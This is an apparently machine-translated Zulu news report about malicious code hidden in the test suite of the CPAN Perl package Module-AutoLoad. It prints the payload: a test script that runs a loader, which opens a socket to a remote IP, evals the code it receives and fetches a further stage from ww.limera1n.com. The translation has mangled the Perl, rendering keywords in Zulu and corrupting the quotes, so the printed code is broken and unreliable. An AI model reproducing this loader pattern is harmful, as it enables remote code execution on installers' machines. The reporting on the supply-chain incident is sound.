Kutholwe ikhodi enobungozi kuphakheji ye-Module-AutoLoad Perl

Kuphakheji ye-Perl esatshalaliswa ngohla lwemibhalo lwe-CPAN Imojula-Ukulayisha Okuzenzakalelayo, eklanyelwe ukulayisha ngokuzenzakalelayo amamojula e-CPAN endizeni, ikhonjiwe ikhodi enonya. Okufakiwe okunonya kwaba kutholiwe kukhodi yokuhlola 05_rcx.t, ebilokhu ithunyelwa kusukela ngo-2011.
Kuyaphawuleka ukuthi imibuzo mayelana nokulayisha ikhodi engabazekayo ivele kuyo I-Stackoverflow emuva ngo-2016.

Umsebenzi onobungozi ukhuphukela emzamweni wokulanda nokusebenzisa ikhodi kusuka kuseva yezinkampani zangaphandle (http://r.cx:1/) ngesikhathi kusetshenziswa umkhankaso wokuhlola oqaliswe lapho ufaka imojuli. Kucatshangwa ukuthi ikhodi elandiwe ekuqaleni kuseva yangaphandle ibingelona unya, kodwa manje isicelo siqondiswe kabusha kusizinda se-ww.limera1n.com, esihlinzeka ngengxenye yayo yekhodi ukuze isetshenziswe.

Ukuhlela ukulanda kufayela 05_rcx.t Kusetshenziswa ikhodi elandelayo:

my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;

Ikhodi eshiwo ibangela ukuthi iskripthi sisetshenziswe ../contrib/RCX.pl, okuqukethwe kwakho kwehliselwe emugqeni:

sebenzisa i-lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};

Lesi script siyalayisha edidekile usebenzisa isevisi perlobfuscator.com ikhodi evela kumsingathi wangaphandle u-r.cx (amakhodi ezinhlamvu 82.46.99.88 ahambisana nombhalo othi "R.cX") futhi ayisebenzise kubhulokhi yokulinganisa.

$ perl -MIO::Isokhethi -e'$b=i-IO entsha::Isokhethi::INET 82.46.99.88.":1″; phrinta <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Ngemva kokukhipha impahla, okulandelayo kwenziwa ekugcineni: ikhodi:

phrinta{$b=i-IO entsha::Isokhethi::INET"ww.limera1n.com:80″}"GET /iJailBreak
";i-evalor return warn$@while$b;1

Iphakheji eyinkinga manje isikhishiwe endaweni yokugcina. KANCANE (Perl Authors Upload Server), futhi i-akhawunti yombhali wemojuli ivinjiwe. Kulokhu, imojula isasele iyatholakala kungobo yomlando ye-MetaCPAN futhi ingafakwa ngokuqondile isuka ku-MetaCPAN kusetshenziswa izinsiza ezifana ne-cpanminus. Kuyaphawulwaukuthi leli phakethe alisakazwanga kabanzi.

Kuyathakazelisa ukuxoxa kuxhunyiwe kanye nombhali wemojuli, ophike ulwazi lokuthi ikhodi enonya ifakwe ngemuva kokuthi isayithi lakhe elithi “r.cx” ligqekeziwe futhi wachaza ukuthi ubezijabulisa nje, futhi wasebenzisa i-perlobfuscator.com ukuze angafihli okuthile, kodwa ukunciphisa usayizi. yekhodi nokwenza lula ukukopishwa kwayo ngebhodi lokunamathisela. Ukukhethwa kwegama lomsebenzi elithi "botstrap" kuchazwa ukuthi leli gama "lizwakala njenge-bot futhi lifushane kune-bootstrap." Umbhali wemojuli uphinde waqinisekisa ukuthi ukukhohlisa okuhlonziwe akwenzi izenzo ezinonya, kodwa kubonisa kuphela ukulayishwa nokwenziwa kwekhodi nge-TCP.

Source: opennet.ru